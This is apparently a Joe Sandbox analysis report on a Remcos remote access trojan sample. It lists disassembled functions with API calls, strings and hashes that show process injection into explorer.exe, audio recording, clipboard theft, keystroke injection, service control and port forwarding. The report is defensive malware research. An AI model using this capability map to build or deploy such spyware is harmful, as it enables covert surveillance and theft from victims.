                        • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                        Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                        • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\Material requirements_1.pif.exe), ref: 00406705
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess
                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                        • API String ID: 2050909247-4145329354
                        • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                        • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                        • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                        • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                        Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                        • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                        • Opcode Fuzzy Hash: 3abd86868e1217ea2d45c9c88d919e3d4f56aa0647f23c1260161372d98c8da3
                        • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                        Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00446DEF
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 00446DFB
                        • _free.LIBCMT ref: 00446E06
                        • _free.LIBCMT ref: 00446E11
                        • _free.LIBCMT ref: 00446E1C
                        • _free.LIBCMT ref: 00446E27
                        • _free.LIBCMT ref: 00446E32
                        • _free.LIBCMT ref: 00446E3D
                        • _free.LIBCMT ref: 00446E48
                        • _free.LIBCMT ref: 00446E56
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                        • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                        • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                        • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                        Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Eventinet_ntoa
                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                        • API String ID: 3578746661-4192532303
                        • Opcode ID: b4f73340190532a4d9c3b2c66da7f5fe2f1e4b8963c915d88a6d33283565f7c0
                        • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                        • Opcode Fuzzy Hash: b4f73340190532a4d9c3b2c66da7f5fe2f1e4b8963c915d88a6d33283565f7c0
                        • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                        Function 00455149 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DecodePointer
                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                        • API String ID: 3527080286-3064271455
                        • Opcode ID: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                        • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                        • Opcode Fuzzy Hash: efaf98d5bece97301cb0be0d87691fc7541a968c6dbfa9ece40fee8aaf611780
                        • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                        Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • Sleep.KERNEL32(00000064), ref: 00416688
                        • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreateDeleteExecuteShellSleep
                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                        • API String ID: 1462127192-2001430897
                        • Opcode ID: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                        • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                        • Opcode Fuzzy Hash: a567638598e5f64f9f586ec3897bdd5cda464973c2cc93408e6715b44c417110
                        • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                        Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • _strftime.LIBCMT ref: 00401AD3
                          • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                        • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                        • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                        • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                        • API String ID: 3809562944-3643129801
                        • Opcode ID: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                        • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                        • Opcode Fuzzy Hash: fe5b0cc2389bb4fc2f756cf4a4e177efe98d3315a5d12e8610d7df5e1ffe9f2e
                        • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                        Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                        • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                        • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                        • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                        • waveInStart.WINMM ref: 00401A81
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                        • String ID: XCG$`=G$x=G
                        • API String ID: 1356121797-903574159
                        • Opcode ID: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                        • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                        • Opcode Fuzzy Hash: f7b885a57264b04ebf2febb913c7ab2768e2f0ab493ecec8a5d98043f26c65d4
                        • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                        Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                          • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                          • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                          • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                        • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                        • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                        • TranslateMessage.USER32(?), ref: 0041CA0B
                        • DispatchMessageA.USER32(?), ref: 0041CA15
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                        • String ID: Remcos
                        • API String ID: 1970332568-165870891
                        • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                        • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                        • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                        • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                        Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                        • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                        • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                        • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                        Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                        • __alloca_probe_16.LIBCMT ref: 00452CA1
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                        • __alloca_probe_16.LIBCMT ref: 00452D4B
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                        • __freea.LIBCMT ref: 00452DBA
                        • __freea.LIBCMT ref: 00452DC6
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 201697637-0
                        • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                        • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                        • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                        • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                        Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                        • _memcmp.LIBVCRUNTIME ref: 004446B3
                        • _free.LIBCMT ref: 00444724
                        • _free.LIBCMT ref: 0044473D
                        • _free.LIBCMT ref: 0044476F
                        • _free.LIBCMT ref: 00444778
                        • _free.LIBCMT ref: 00444784
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorLast$_abort_memcmp
                        • String ID: C
                        • API String ID: 1679612858-1037565863
                        • Opcode ID: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                        • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                        • Opcode Fuzzy Hash: acf25849c73b51f2f110b66ae3427c3368cce3f94afac0067903556d8f1eaec6
                        • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                        Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: tcp$udp
                        • API String ID: 0-3725065008
                        • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                        • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                        • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                        • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                        Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                        • String ID: .part
                        • API String ID: 1303771098-3499674018
                        • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                        • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                        • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                        • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                        Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                        • _wcslen.LIBCMT ref: 0041A906
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                        • API String ID: 37874593-703403762
                        • Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                        • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                        • Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                        • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                        Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                        • __alloca_probe_16.LIBCMT ref: 004499F2
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                        • __alloca_probe_16.LIBCMT ref: 00449AD7
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                        • __freea.LIBCMT ref: 00449B47
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • __freea.LIBCMT ref: 00449B50
                        • __freea.LIBCMT ref: 00449B75
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 3864826663-0
                        • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                        • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                        • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                        • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                        Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendInput.USER32 ref: 00418B18
                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                        • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                          • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: InputSend$Virtual
                        • String ID:
                        • API String ID: 1167301434-0
                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                        • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                        • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                        Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32 ref: 00415A46
                        • EmptyClipboard.USER32 ref: 00415A54
                        • CloseClipboard.USER32 ref: 00415A5A
                        • OpenClipboard.USER32 ref: 00415A61
                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                        • CloseClipboard.USER32 ref: 00415A89
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                        • String ID:
                        • API String ID: 2172192267-0
                        • Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                        • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                        • Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                        • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                        Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16
                        • String ID: a/p$am/pm$fD
                        • API String ID: 3509577899-1143445303
                        • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                        • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                        • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                        • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                        Function 00447E4A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 00447ECC
                        • _free.LIBCMT ref: 00447EF0
                        • _free.LIBCMT ref: 00448077
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                        • _free.LIBCMT ref: 00448243
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
